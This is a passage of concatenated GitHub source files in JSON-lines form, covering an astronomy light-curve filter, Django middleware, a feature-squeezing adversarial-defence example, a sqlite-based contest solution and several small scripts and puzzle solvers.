%\r\n list(datafilter))\r\n\r\n continue\r\n\r\n # if all of the tests above pass, then process this filter\r\n else:\r\n\r\n filter_cond_elements = filter_conds\r\n filter_cond_operator = filter_cond_elements[0]\r\n\r\n # deal with the between operator\r\n if (len(filter_cond_elements[1:]) > 1 and\r\n filter_cond_operator == 'between'):\r\n\r\n operand1, operand2 = filter_cond_elements[1:]\r\n\r\n if operand1.isalpha():\r\n operand1 = \"'%s'\" % operand1\r\n if operand2.isalpha():\r\n operand2 = \"'%s'\" % operand2\r\n\r\n # take care of the special case of FLT, FLD having\r\n # string format but possibly numerical values\r\n if filter_col in ('FLT', 'FLD'):\r\n operand1 = \"'%s'\" % operand1\r\n operand2 = \"'%s'\" % operand2\r\n\r\n condition_string = conf.CONDITION_OPERATORS[\r\n filter_cond_operator\r\n ].format(\r\n col=filter_col,\r\n operand1=operand1,\r\n operand2=operand2\r\n )\r\n\r\n # deal with the other operators\r\n else:\r\n\r\n operand1 = filter_cond_elements[1]\r\n\r\n if operand1.isalpha():\r\n operand1 = \"'%s'\" % operand1\r\n\r\n # take care of the special case of FLT, FLD having\r\n # string format but possibly numerical values\r\n if filter_col in ('FLT', 'FLD'):\r\n operand1 = \"'%s'\" % operand1\r\n\r\n condition_string = conf.CONDITION_OPERATORS[\r\n filter_cond_operator\r\n ].format(\r\n col=filter_col,\r\n operand1=operand1\r\n )\r\n\r\n full_filter_string = '%s %s' % (\r\n filter_operators[filter_op],\r\n condition_string\r\n )\r\n where_eval_strlist.append(full_filter_string)\r\n\r\n # if we can't parse this filter at all, then ignore it\r\n else:\r\n\r\n if LOGGER:\r\n LOGGER.warning('filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n if DEBUGMODE:\r\n print('lcutils.parse_hatlc_filters:'\r\n ' filter %s is bad, ignoring...' %\r\n list(datafilter))\r\n\r\n continue\r\n\r\n\r\n # now check for dangling filter operators caused by broken filters in the\r\n # chain\r\n where_eval_checklist = where_eval_strlist[:]\r\n for find, filt in enumerate(where_eval_checklist):\r\n if find == 0 and filt[0] == '&':\r\n where_eval_strlist[0] = (where_eval_strlist[0]).lstrip('& ')\r\n\r\n where_eval_string = (\r\n 'np.where({array_expression})'.format(\r\n array_expression=' '.join(where_eval_strlist)\r\n )\r\n )\r\n\r\n return where_eval_string\r\n\r\n\r\n\r\ndef filter_consolidated_hatlc(hatlc,\r\n filters,\r\n hatlc_is_dict=False,\r\n outtype='ssv',\r\n compress='gz',\r\n outdir=None):\r\n '''\r\n This filters a consolidated hatlc using the filter list given in filters.\r\n\r\n filters is a sequence of tuples describing the conditions on the columns to\r\n satisfy. these MUST follow the rules below.\r\n\r\n condition tuple = ('','','')\r\n\r\n if the first item is left out and/or the condition tuple is not the first or\r\n only one, then all conditions are ANDed together. 
otherwise, the specified\r\n condition logical operators are used.\r\n\r\n MUST be one of those in lcutils_config.TEXTLC_OUTPUT_COLUMNS\r\n\r\n MUST be any one of the following strings:\r\n\r\n '= ',\r\n '!= ',\r\n '> ',\r\n '< ',\r\n '<= ',\r\n '>= ',\r\n 'between '\r\n\r\n filters that don't meet these rules will be discarded; a warning will be\r\n logged/printed for each one that ends up this way\r\n\r\n '''\r\n\r\n # if the input is an lcdict instead of a HATLC filename, then just use it\r\n # directly\r\n if hatlc_is_dict:\r\n lc = hatlc\r\n else:\r\n lc = read_consolidated_hatlc(hatlc)\r\n\r\n if not isinstance(filters, list):\r\n filters = [x for x in filters]\r\n\r\n where_eval_string = parse_hatlc_filters(filters)\r\n\r\n # make sure that we have at least one filter to apply\r\n if where_eval_string != 'np.where()':\r\n\r\n if LOGGER:\r\n LOGGER.warning('evaling string %s' % where_eval_string)\r\n if DEBUGMODE:\r\n print('lcutils: warning: evaling string %s' % where_eval_string)\r\n\r\n # eval the full np.where expression and get the results\r\n filter_result_indices = eval(where_eval_string)\r\n\r\n # if filter_result_indices has a nonzero length, then use it to filter\r\n # the lightcurve columns\r\n if len(filter_result_indices[0]) > 0:\r\n\r\n for col in lc['cols']:\r\n lc[col] = lc[col][filter_result_indices]\r\n\r\n # amend the ndet key in the LC dict as required\r\n # after the filtering process\r\n lc['ndet'] = len(filter_result_indices[0])\r\n\r\n # amend hatstations key in the LC dict as required after the\r\n # filtering process\r\n if 'STF' in lc and 'NET' in lc:\r\n\r\n nets_and_stations = ['%s%02i' % (x,y) for\r\n (x,y) in zip(lc['NET'], lc['STF'])]\r\n remaining_stations = list(set(nets_and_stations))\r\n lc['hatstations'] = remaining_stations\r\n\r\n else:\r\n # append a warning saying that the station list is out of date\r\n # if the STF column is not present\r\n lc['hatstations'].append('warning: station list is '\r\n 'from original LC since '\r\n 'no STF/NET columns in original LC')\r\n\r\n # amend filters key in the LC dict as required after the filtering\r\n # process\r\n if 'FLT' in lc:\r\n\r\n remaining_filters = np.unique(lc['FLT'])\r\n lc['filters'] = remaining_filters.tolist()\r\n\r\n else:\r\n # append a warning saying that the filter list\r\n # is out of date if the FLT column is not present\r\n # append a warning saying that the station list is out of date\r\n # if the STF column is not present\r\n lc['filters'].append('warning: filter list is '\r\n 'from original LC since '\r\n 'no FLT column in original LC')\r\n\r\n\r\n # generate a filter hash describing what filters were applied\r\n lcfilters_string = [list(x) for x in filters]\r\n lcfilters_string = repr(lcfilters_string)\r\n lcfilterhash = hashlib.md5(lcfilters_string).hexdigest()\r\n\r\n # return a dict if the outtype is none\r\n if outtype is None:\r\n\r\n return (lc, 'filters_ok', lcfilterhash)\r\n\r\n # otherwise, write the actual LC to disk\r\n else:\r\n\r\n outfname = write_consolidated_hatlc(lc,\r\n outtype=outtype,\r\n compress=compress,\r\n outdir=outdir,\r\n filterhash=lcfilterhash)\r\n\r\n return (outfname, 'filters_ok', lcfilterhash)\r\n\r\n else:\r\n\r\n if LOGGER:\r\n LOGGER.warning('lcutils.filter_consolidated_hatlc: '\r\n 'applied filters return nothing')\r\n if DEBUGMODE:\r\n print('lcutils.filter_consolidated_hatlc: '\r\n 'applied filters return nothing')\r\n\r\n # generate a filter hash describing what filters were applied\r\n lcfilters_string = [list(x) for x in filters]\r\n 
lcfilters_string = repr(lcfilters_string)\r\n lcfilterhash = hashlib.md5(lcfilters_string).hexdigest()\r\n\r\n return (hatlc, 'filters_noresults', lcfilterhash)\r\n\r\n else:\r\n\r\n if LOGGER:\r\n LOGGER.warning('lcutils.filter_consolidated_hatlc: '\r\n 'no valid filters could be parsed')\r\n if DEBUGMODE:\r\n print('lcutils.filter_consolidated_hatlc: '\r\n 'no valid filters could be parsed')\r\n\r\n return (hatlc, 'filters_invalid', None)\r\n","repo_name":"johnh2o2/rrlyrclassification","sub_path":"lcutils/lcutils_hatlc.py","file_name":"lcutils_hatlc.py","file_ext":"py","file_size_in_byte":37177,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"20652762285","text":"from django.contrib import messages\nfrom django.contrib.auth import logout\nfrom django.shortcuts import get_object_or_404\nfrom django.utils import timezone\nfrom django.utils.deprecation import MiddlewareMixin\nfrom django.utils.translation import gettext_lazy as _\n\n\nfrom seance.models import AdvUser\n\n\nclass LogoutIfInActiveMiddleware(MiddlewareMixin):\n @staticmethod\n def process_request(request):\n assert hasattr(request, 'user'), (\n 'The LogoutIfNotActiveMiddleware middleware requires authentication middleware to be installed.'\n )\n if request.user.is_authenticated:\n if request.user.is_superuser or (request.user.last_activity >\n timezone.now() - timezone.timedelta(minutes=5)):\n user = get_object_or_404(AdvUser, pk=request.user.pk)\n user.last_activity = timezone.now()\n user.save()\n request.user.last_activity = user.last_activity\n else:\n logout(request)\n messages.add_message(request, messages.INFO, _('More than 5 minutes inactive. '\n 'Please login again'))\n\n\ndef seance_context_processor(request):\n context = {}\n basket = request.session.get('basket', None)\n last_seance = request.session.get('last_seance', None)\n if basket:\n context['basket'] = basket\n total_price = 0\n for key in basket:\n total_price += float(basket[key]['price'])\n context['total_price'] = total_price\n if last_seance:\n context['last_seance'] = last_seance\n return context\n\n\n","repo_name":"MikeYeromenko/diploma_old","sub_path":"seance/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"75251217236","text":"\"\"\"sumary_line\n\nKeyword arguments:\nargument -- description\nReturn: return_description\n\"\"\"\nimport requests\n\nurl = \"https://fakerestapi.azurewebsites.net/api/v1/Activities\"\n\ndata ={\n \"id\": 0,\n \"title\": \"string\",\n \"dueDate\": \"2023-09-02T15:08:55.717Z\",\n \"completed\": True\n}\n\nheaders = {\n 'Content-type': 'application/json; charset = UTF-8'\n}\n\nresponse = requests.post(url, headers=headers, json=data)\nprint(response.text)\n\n\"\"\"\n{\"id\":0,\"title\":\"string\",\"dueDate\":\"2023-09-02T15:08:55.717Z\",\"completed\":true}\nWhat i have done:\nI have take a fake api and tried post with some sample data\nusing requests module in python\n\"\"\"\nfrom bs4 import BeautifulSoup\nurl = \"https://www.google.com/\"\nr = requests.get(url)\nsoup = BeautifulSoup(r.text, \"html.parser\")\nprint(soup.prettify())\n\nfor heading in soup.find_all(\"h2\"):\n print(heading.text)","repo_name":"Aditya-1998k/Python-Tutorial","sub_path":"Day89.py","file_name":"Day89.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} 
+{"seq_id":"18650528033","text":"import pygame\nimport math\nimport time\nimport random\n\nranposx = random.randrange(25,750)\nranposy = random.randrange(25,585)\n\ndef newski(ranx,rany):\n skiobject = [ranx,rany]\n return skiobject\n\nwinx = 800\nwiny = 600\npygame.display.init()\n\nscreen = pygame.display.set_mode((winx,winy))\nred = (255,0,0)\nwhite = (255,255,255)\nblack = (0,0,0)\nrad = 25\nclock = pygame.time.Clock()\n\ndone = False\nskilist = []\nvelocity = [[0.0,0.0]]\ntheta = 0\nfriction = 0.00001\nskilist.append(newski(ranposx,ranposy))\nwhile not done:\n #Update\n dT = clock.tick() / 1000.0\n\n for vobject in velocity:\n #print(vobject)\n if(vobject[0] > 0.0):\n vobject[0] -= friction\n if(vobject[0] < 0.0):\n vobject[0] += friction\n if(vobject[1] > 0.0):\n vobject[1] -= friction\n if(vobject[1] < 0.0):\n vobject[1] += friction\n\n for s in skilist:\n position_vector = [[s[0]+velocity[0][0],s[1]+velocity[0][1]]]\n if(s[0] > winx-rad):\n s[0] = (winx + rad) - s[0]\n\n if(s[1] > winy-rad):\n s[1] = (winy + rad) - s[1]\n\n if(s[0] < rad):\n s[0] = (winx - rad) - s[0]\n\n if(s[1] < rad):\n s[1] = (winy - rad) - s[1]\n\n s[0]+=velocity[0][0]\n s[1]+=velocity[0][1]\n\n #input\n events = pygame.event.get()\n for e in events:\n if e.type == pygame.KEYDOWN:\n if e.key == pygame.K_ESCAPE:\n done = True\n if e.key == pygame.K_w:\n for ie in velocity:\n ie[1]-=0.1\n if e.key == pygame.K_a:\n for ii in velocity:\n ii[0]-=0.1\n if e.key == pygame.K_d:\n for nie in velocity:\n nie[0]+=0.1\n if e.key == pygame.K_s:\n for m in velocity:\n m[1]+=0.1\n\n screen.fill(black)\n for ski in skilist:\n position_vector = [ [ ski[0]+velocity[0][0]*10,ski[1]+velocity[0][1]*10 ] ]\n pygame.draw.circle(screen,red,(int(ski[0]),int(ski[1])),rad)\n pygame.draw.line(screen,red,ski,(position_vector[0][0],position_vector[0][1]))\n pygame.display.flip()\npygame.display.quit()","repo_name":"Kingcitaldo125/Python-Files","sub_path":"src/skicircle.py","file_name":"skicircle.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"40083315612","text":"import sqlite3\n\ndef main():\n con = sqlite3.connect(':memory:')\n cur = con.cursor()\n cur.executescript(\"\"\"\n CREATE TABLE blocks (r INTEGER NOT NULL, c INTEGER NOT NULL);\n CREATE INDEX idx_r_c ON blocks (r, c);\n CREATE INDEX idx_c_r ON blocks (c, r);\n \"\"\")\n\n H, W, rs, cs = map(int, input().split())\n N = int(input())\n for _ in range(N):\n r, c = map(int, input().split())\n cur.execute('INSERT INTO blocks VALUES (?,?)', (r, c))\n Q = int(input())\n r, c = rs, cs\n for _ in range(Q):\n d, l = input().split()\n l = int(l)\n if d == 'R':\n tc = min(c+l, W)\n cur.execute('SELECT c FROM blocks WHERE r = ? AND c BETWEEN ? AND ? ORDER BY c ASC LIMIT 1', (r, c, tc))\n res = cur.fetchone()\n if res:\n c = res[0] - 1\n else:\n c = tc\n elif d == 'L':\n tc = max(c-l, 1)\n cur.execute('SELECT c FROM blocks WHERE r = ? AND c BETWEEN ? AND ? ORDER BY c DESC LIMIT 1', (r, tc, c))\n res = cur.fetchone()\n if res:\n c = res[0] + 1\n else:\n c = tc\n elif d == 'D':\n tr = min(r+l, H)\n cur.execute('SELECT r FROM blocks WHERE c = ? AND r BETWEEN ? AND ? ORDER BY r ASC LIMIT 1', (c, r, tr))\n res = cur.fetchone()\n if res:\n r = res[0] - 1\n else:\n r = tr\n elif d == 'U':\n tr = max(r-l, 1)\n cur.execute('SELECT r FROM blocks WHERE c = ? AND r BETWEEN ? AND ? 
ORDER BY r DESC LIMIT 1', (c, tr, r))\n res = cur.fetchone()\n if res:\n r = res[0] + 1\n else:\n r = tr\n print(r, c)\n\n\nmain()\n\n","repo_name":"aruma256/kyopro","sub_path":"src/AtCoder/abc273/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"28542613150","text":"\"\"\"empty message\n\nRevision ID: 458b59151789\nRevises: b7d09e7e34f4\nCreate Date: 2021-01-16 17:20:49.281514\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '458b59151789'\ndown_revision = 'b7d09e7e34f4'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('project', sa.Column('last_edit', sa.DateTime(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('project', 'last_edit')\n # ### end Alembic commands ###\n","repo_name":"SnSation/PortfolioAPI_FlaskVersion","sub_path":"migrations/versions/458b59151789_.py","file_name":"458b59151789_.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"42209733809","text":"import numpy as np\nimport cv2 as cv\n\nfilename = 'catur.jpeg'\nimg = cv.imread(filename)\n\n# Mengubah gambar menjadi grayscale\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\n# Mencari titik sudut dengan metode Harris\ngray = np.float32(gray)\ndst = cv.cornerHarris(gray, 2, 3, 0.04)\ndst = cv.dilate(dst, None)\n\n# Mengaplikasikan threshold dan konversi tipe data\nret, dst = cv.threshold(dst, 0.01 * dst.max(), 255, 0)\ndst = np.uint8(dst)\n\n# Mencari centroid\nret, labels, stats, centroids = cv.connectedComponentsWithStats(dst)\n\n# Membuat kriteria untuk pengembangan titik sudut\ncriteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 100, 0.001)\ncorners = cv.cornerSubPix(gray, np.float32(centroids), (5, 5), (-1, -1), criteria)\n\n# Menampilkan titik sudut pada gambar\nfor i in range(len(corners)):\n x, y = corners[i]\n cv.circle(img, (int(x), int(y)), 5, (0, 0, 255), -1)\n\n# Menampilkan gambar hasil\ncv.imshow('corners', img)\n\n# Menunggu input keyboard\nif cv.waitKey(0) & 0xff == 27:\n cv.destroyAllWindows()","repo_name":"hilyahkamilGithub99/baru","sub_path":"latihan/baru/dua.py","file_name":"dua.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8024751039","text":"# -*- coding: utf-8 -*-\n# 1054. 
距离相等的条形码 https://leetcode.cn/problems/distant-barcodes/\nfrom typing import List\n\n\nclass Solution:\n def rearrangeBarcodes(self, barcodes: List[int]) -> List[int]:\n n, counter = 0, {}\n max_count = 0\n for barcode in barcodes:\n n += 1\n counter[barcode] = counter.get(barcode, 0) + 1\n max_count = max(max_count, counter[barcode])\n even, odd = 0, 1\n half = n // 2\n for x, count in counter.items():\n while 0 < count <= half and odd < n: # 元素出现次数超过数组长度的一半,必须放在偶数下标\n barcodes[odd] = x\n count -= 1\n odd += 2\n while count > 0:\n barcodes[even] = x\n count -= 1\n even += 2\n return barcodes\n\n\nif __name__ == '__main__':\n obj = Solution()\n print(obj.rearrangeBarcodes([1, 1, 1, 1, 2, 2, 3, 3]))\n","repo_name":"code-cold-love/DSProject","sub_path":"leetcode/problems/distant-barcodes.py","file_name":"distant-barcodes.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36834180281","text":"import logging\nimport os\n\nimport numpy as np\n\nfrom aad.basemodels import MnistCnnV2, ModelContainerPT\nfrom aad.datasets import DATASET_LIST, DataContainer\nfrom aad.defences import FeatureSqueezing\nfrom aad.utils import get_data_path\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\ndef build_model_filename(model_name, dataset, epochs):\n return f'{model_name}_{dataset}_e{epochs}.pt'\n\n\ndef build_squeezer_filename(model_name, data_name, max_epochs, filter_name):\n \"\"\"\n Pre-train file example: MnistCnnV2_MNIST_e50_binary.pt\n \"\"\"\n return f'{model_name}_{data_name}_e{max_epochs}_{filter_name}.pt'\n\n\ndef build_adv_filename(model_name, dataset, attack_name):\n return f'{model_name}_{dataset}_{attack_name}_adv.npy'\n\n\nMODEL_NAME = 'MnistCnnV2'\nDATASET = 'MNIST'\nMAX_EPOCHS = 50\nBIT_DEPTH = 8\nSIGMA = 0.2\nKERNEL_SIZE = 3\n\nMODEL_FILE = os.path.join(\n 'save',\n build_model_filename(MODEL_NAME, DATASET, MAX_EPOCHS)\n)\n\n\ndef main():\n # load dataset and initial model\n model = MnistCnnV2()\n dc = DataContainer(DATASET_LIST[DATASET], get_data_path())\n dc(shuffle=True, normalize=True)\n mc = ModelContainerPT(model, dc)\n mc.load(MODEL_FILE)\n accuracy = mc.evaluate(dc.x_test, dc.y_test)\n print(f'Accuracy on test set: {accuracy}')\n\n # train or load pretrained parameters\n squeezer = FeatureSqueezing(\n mc,\n ['median', 'normal', 'binary'],\n bit_depth=BIT_DEPTH,\n sigma=SIGMA,\n kernel_size=KERNEL_SIZE,\n pretrained=True\n )\n\n x_test = dc.x_test\n y_test = dc.y_test\n mc_binary = squeezer.get_def_model_container('binary')\n mc_median = squeezer.get_def_model_container('median')\n mc_normal = squeezer.get_def_model_container('normal')\n\n print('before fit')\n acc_bin = mc_binary.evaluate(\n squeezer.apply_binary_transform(x_test), y_test)\n print(f'Accuracy of binary squeezer: {acc_bin}')\n acc_med = mc_median.evaluate(\n squeezer.apply_median_transform(x_test), y_test)\n print(f'Accuracy of median squeezer: {acc_med}')\n acc_nor = mc_normal.evaluate(\n squeezer.apply_normal_transform(x_test), y_test)\n print(f'Accuracy of normal squeezer: {acc_nor}')\n\n if not squeezer.does_pretrained_exist(MODEL_FILE):\n squeezer.fit(max_epochs=MAX_EPOCHS, batch_size=128)\n\n print('after fit')\n acc_bin = mc_binary.evaluate(\n squeezer.apply_binary_transform(x_test), y_test)\n print(f'Accuracy of binary squeezer: {acc_bin}')\n acc_med = mc_median.evaluate(\n squeezer.apply_median_transform(x_test), y_test)\n print(f'Accuracy of median squeezer: {acc_med}')\n acc_nor = mc_normal.evaluate(\n 
squeezer.apply_normal_transform(x_test), y_test)\n print(f'Accuracy of normal squeezer: {acc_nor}')\n\n squeezer.save(MODEL_FILE, True)\n\n print('after load')\n squeezer.load(MODEL_FILE)\n acc_bin = mc_binary.evaluate(\n squeezer.apply_binary_transform(x_test), y_test)\n print(f'Accuracy of binary squeezer: {acc_bin}')\n acc_med = mc_median.evaluate(\n squeezer.apply_median_transform(x_test), y_test)\n print(f'Accuracy of median squeezer: {acc_med}')\n acc_nor = mc_normal.evaluate(\n squeezer.apply_normal_transform(x_test), y_test)\n print(f'Accuracy of normal squeezer: {acc_nor}')\n\n # load adversarial examples\n adv_list = ['FGSM', 'BIM', 'DeepFool', 'Carlini', 'Saliency']\n y_file = os.path.join(\n 'save',\n f'{MODEL_NAME}_{DATASET}_{adv_list[0]}_y.npy')\n x_file = os.path.join(\n 'save',\n f'{MODEL_NAME}_{DATASET}_{adv_list[0]}_x.npy')\n x = np.load(x_file, allow_pickle=False)\n y = np.load(y_file, allow_pickle=False)\n acc_og = mc.evaluate(x, y)\n acc_squeezer = squeezer.evaluate(x, y)\n print(f'Accuracy on clean set - OG: {acc_og}, Squeezer: {acc_squeezer}')\n\n for adv_name in adv_list:\n adv_file = os.path.join(\n 'save',\n build_adv_filename(MODEL_NAME, DATASET, adv_name))\n adv = np.load(adv_file, allow_pickle=False)\n acc_og = mc.evaluate(adv, y)\n acc_squeezer = squeezer.evaluate(adv, y)\n print(\n f'Accuracy on {adv_name} set - OG: {acc_og}, Squeezer: {acc_squeezer}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"changx03/adversarial_attack_defence","sub_path":"examples/example_squeezer.py","file_name":"example_squeezer.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"34795327066","text":"\"\"\"\nGiven an integer array nums and an integer k, \nreturn the k most frequent elements. You may return the answer in any order.\n\nInput: nums = [1,1,1,2,2,3], k = 2\nOutput: [1,2]\n\nInput: nums = [1], k = 1\nOutput: [1]\n\"\"\"\n\nnums = [3,0,1,0]\nk = 1\n\ndef topKFrequentElemet(nums, k):\n count = {}\n\n for i in range(len(nums)):\n if nums[i] not in count:\n count[nums[i]] = 1\n else:\n count[nums[i]] +=1 \n count = {k:v for k, v in sorted(count.items(), key=lambda item: item[1], reverse=True)}\n \n ans = []\n for key, _ in count.items():\n ans.append(key)\n\n return ans[:k]\n \n\nprint(\n topKFrequentElemet(nums,1)\n)","repo_name":"iamhimanshu0/Coding-Interview-Preparation","sub_path":"Python_/qus/topKFrequentElemets.py","file_name":"topKFrequentElemets.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"85"} +{"seq_id":"16364052405","text":"import os\nimport shutil\n\nfrom setuptools import find_packages, setup\n\n\ndef main():\n here = os.path.abspath(os.path.dirname(__file__))\n\n # Get the long description from the relevant file\n long_description = \"\"\n try:\n with open(os.path.join(here, \"README.rst\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n except:\n pass\n\n setup(\n name=\"rubaialter\",\n # Versions should comply with PEP440. 
For a discussion on single-sourcing\n # the version across setup.py and the project code, see\n # http://packaging.python.org/en/latest/tutorial.html#version\n version=\"1.1.0b1\",\n description=\"Rubaialter is a module that will perform conversions among these .csv ,.xlsx, .xls, .sqlite3 file formats using Pandas under the hood.\",\n long_description=long_description,\n long_description_content_type=\"text/x-rst\",\n # The project's main homepage.\n url=\"https://github.com/TechLearnersInc/rubaialter\",\n # Author details\n author=\"Muhammad Sakib Khan Inan\",\n author_email=\"sakib.khaninan@gmail.com\",\n # Choose your license\n license=\"MIT\",\n # Minimum Python version required\n python_requires=\">=3.6\",\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n project_urls={\n \"Source\": \"https://github.com/TechLearnersInc/rubaialter\",\n \"Tracker\": \"https://github.com/TechLearnersInc/rubaialter/issues\",\n \"Facebook\": \"https://www.facebook.com/TechLearnersInc\",\n \"Linkedin\": \"https://www.linkedin.com/company/techlearners/\",\n \"Telegram\": \"https://t.me/TechLearners\",\n },\n classifiers=[\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n \"Development Status :: 4 - Beta\",\n \"Environment :: Console\",\n # Indicate who your project is intended for\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"Topic :: Utilities\",\n # Pick your license as you wish (should match \"license\" above)\n \"License :: OSI Approved :: MIT License\",\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n ],\n # What does your project relate to?\n keywords=\"pandas rubaialter csv xls excel xlsx sqlite sqlite3 converter dataset\",\n # You can just specify the packages manually here if your project is\n # simple. Or you can use find_packages().\n packages=find_packages(),\n # List run-time dependencies here. These will be installed by pip\n # when your project is installed. For an analysis of \"install_requires\"\n # vs pip's requirements files see:\n # https://packaging.python.org/en/latest/technical.html#install-requires-vs-requirements-files\n install_requires=[\"openpyxl\", \"pandas\", \"xlrd\", \"xlwt\"],\n # To provide executable scripts, use entry points in preference to the\n # \"scripts\" keyword. Entry points provide cross-platform support and allow\n # pip to create the appropriate form of executable for the target platform.\n entry_points={\n \"console_scripts\": [\n \"rubaialter=rubaialter:main\",\n ]\n },\n )\n\n # Cleanup\n try:\n shutil.rmtree(\"rubaialter.egg-info\")\n shutil.rmtree(\"build\")\n except Exception:\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TechLearnersInc/rubaialter","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"8530890601","text":"#!/usr/bin/env pypy3\n\nimport sys\nimport time\n\nDEBUG = sys.argv.count('-v')\n\ndef debug(*args):\n if DEBUG:\n print(*args)\n\ndef parse_input():\n lines = [_.strip('\\r\\n') for _ in sys.stdin]\n hall = list('.. . . . 
..')\n rooms = [[] for _ in range(4)]\n for r, c in [(0, 3), (1, 5), (2, 7), (3, 9)]:\n rooms[r].append(lines[2][c])\n rooms[r].append(lines[3][c])\n return rooms, hall\n\n# power per step\npower = {\n 'A': 1,\n 'B': 10,\n 'C': 100,\n 'D': 1000,\n}\n\n# room and position to hall position distances\ndists = {\n # ((room, position), hall spot): distance\n ((0, 0), 0): 3,\n ((0, 0), 1): 2,\n ((0, 0), 3): 2,\n ((0, 0), 5): 4,\n ((0, 0), 7): 6,\n ((0, 0), 9): 8,\n ((0, 0), 10): 9,\n\n ((1, 0), 0): 5,\n ((1, 0), 1): 4,\n ((1, 0), 3): 2,\n ((1, 0), 5): 2,\n ((1, 0), 7): 4,\n ((1, 0), 9): 6,\n ((1, 0), 10): 7,\n\n ((2, 0), 0): 7,\n ((2, 0), 1): 6,\n ((2, 0), 3): 4,\n ((2, 0), 5): 2,\n ((2, 0), 7): 2,\n ((2, 0), 9): 4,\n ((2, 0), 10): 5,\n\n ((3, 0), 0): 9,\n ((3, 0), 1): 8,\n ((3, 0), 3): 6,\n ((3, 0), 5): 4,\n ((3, 0), 7): 2,\n ((3, 0), 9): 2,\n ((3, 0), 10): 3,\n}\n\n# reverse mapping and add additional positions to the rooms\nfor k, v in list(dists.items()):\n x, h = k\n r, p = x\n dists[((r, p+1), h)] = v+1\n dists[((r, p+2), h)] = v+2\n dists[((r, p+3), h)] = v+3\n\n # also reverse mapping\n dists[(h, (r, p))] = v\n dists[(h, (r, p+1))] = v+1\n dists[(h, (r, p+2))] = v+2\n dists[(h, (r, p+3))] = v+3\n\nroom_to_hall = {\n # room: hall left and right in order, break if occupied...\n 0: ([1, 0], [3, 5, 7, 9, 10]),\n 1: ([3, 1, 0], [5, 7, 9, 10]),\n 2: ([5, 3, 1, 0], [7, 9, 10]),\n 3: ([7, 5, 3, 1, 0], [9, 10]),\n}\n\nhall_to_room = {\n # (hall, room): [hall spots to check]\n (0, 0): [1],\n (1, 0): [],\n (3, 0): [],\n (5, 0): [3],\n (7, 0): [5, 3],\n (9, 0): [7, 5, 3],\n (10, 0): [9, 7, 5, 3],\n\n (0, 1): [1, 3],\n (1, 1): [3],\n (3, 1): [],\n (5, 1): [],\n (7, 1): [5],\n (9, 1): [7, 5],\n (10, 1): [9, 7, 5],\n\n (0, 2): [1, 3, 5],\n (1, 2): [3, 5],\n (3, 2): [5],\n (5, 2): [],\n (7, 2): [],\n (9, 2): [7],\n (10, 2): [9, 7],\n\n (0, 3): [1, 3, 5, 7],\n (1, 3): [3, 5, 7],\n (3, 3): [5, 7],\n (5, 3): [7],\n (7, 3): [],\n (9, 3): [],\n (10, 3): [9],\n}\n\n# pod -> destination room\npod_rooms = [('A', 0), ('B', 1), ('C', 2), ('D', 3)]\ndest = dict(pod_rooms)\ndest.update({r: p for p, r in pod_rooms})\n\nclass State:\n def __init__(self, rooms, hall, energy=0):\n self.rooms = [list(_) for _ in rooms]\n self.hall = list(hall)\n self.energy = energy\n self.last = None\n\n def get(self, pos):\n if isinstance(pos, tuple):\n return self.rooms[pos[0]][pos[1]]\n return self.hall[pos]\n\n def set(self, pos, v):\n if isinstance(pos, tuple):\n self.rooms[pos[0]][pos[1]] = v\n else:\n self.hall[pos] = v\n\n def move(self, start, end):\n # move (swap) start/end, add cost of this to energy\n pod = self.get(start)\n self.energy += dists[(start, end)] * power[pod]\n tmp = self.get(end)\n assert tmp == '.'\n self.set(end, self.get(start))\n self.set(start, tmp)\n\n def copy(self):\n s = State(self.rooms, self.hall, self.energy)\n s.last = self\n return s\n\n def print(self):\n print('#' * (len(self.hall)+2), self.energy)\n print('#' + ''.join(self.hall) + '#')\n for i in 